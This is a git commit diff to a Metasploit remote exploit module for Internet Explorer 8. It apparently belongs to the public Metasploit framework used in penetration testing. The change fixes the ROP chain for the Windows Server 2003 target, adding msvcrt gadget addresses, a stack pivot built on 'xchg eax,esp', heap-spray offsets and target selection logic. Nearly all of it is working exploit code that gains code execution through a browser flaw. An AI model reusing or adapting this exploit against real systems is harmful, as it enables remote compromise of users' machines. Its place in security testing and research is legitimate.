fixed rop chain for w2003

bug/bundler_fix
jvazquez-r7 2012-12-30 13:12:55 +01:00
parent cab84b5c27
commit cd58cc73d9
1 changed files with 13 additions and 9 deletions

View File

@ -58,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Automatic', {} ], [ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Dec 27 2012", 'DisclosureDate' => "Dec 27 2012",
@ -90,9 +90,6 @@ class Metasploit3 < Msf::Exploit::Remote
os_name = 'Windows Vista' os_name = 'Windows Vista'
when '6.1' when '6.1'
os_name = 'Windows 7' os_name = 'Windows 7'
else
# OS not supported
return nil
end end
targets.each do |t| targets.each do |t|
@ -152,10 +149,17 @@ Stack Pivoting to eax:
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret if t['Name'] =~ /Windows XP/
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
end
else else
print_status("Using JRE ROP") print_status("Using JRE ROP")
stack_pivot = [0x7c348b06].pack("V") * 54 # ret stack_pivot = [0x7c348b06].pack("V") * 54 # ret